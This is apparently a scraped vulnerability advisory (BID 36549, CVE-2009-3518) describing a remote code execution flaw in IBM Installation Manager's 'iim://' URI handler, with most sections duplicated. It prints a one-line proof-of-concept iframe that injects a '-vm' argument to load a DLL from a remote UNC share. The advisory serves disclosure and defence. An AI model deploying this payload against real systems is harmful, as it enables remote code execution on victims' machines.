IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
BID:36549
Info
IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
| Bugtraq ID: | 36549 |
| Class: | Design Error |
| CVE: |
CVE-2009-3518 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 29 2009 12:00AM |
| Updated: | Apr 17 2014 01:02AM |
| Credit: | nine:situations:group::bruiser |
| Vulnerable: |
IBM Installation Manager 1.3 |
| Not Vulnerable: | |
Discussion
IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
IBM Installation Manager is prone to a remote code-execution vulnerability.
Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
The following products that include Installation Manager are vulnerable:
IBM Rational Robot
IBM Rational Team Concert
IBM Installation Manager is prone to a remote code-execution vulnerability.
Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
The following products that include Installation Manager are vulnerable:
IBM Rational Robot
IBM Rational Team Concert
Exploit / POC
IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
The following proof of concept is available:
<iframe src='iim://" -vm \\www.example.com\uncshare\sh.dll -url "'></iframe>
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof of concept is available:
<iframe src='iim://" -vm \\www.example.com\uncshare\sh.dll -url "'></iframe>
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
Solution / Fix
IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
References:
References:
- IBM Homepage (IBM)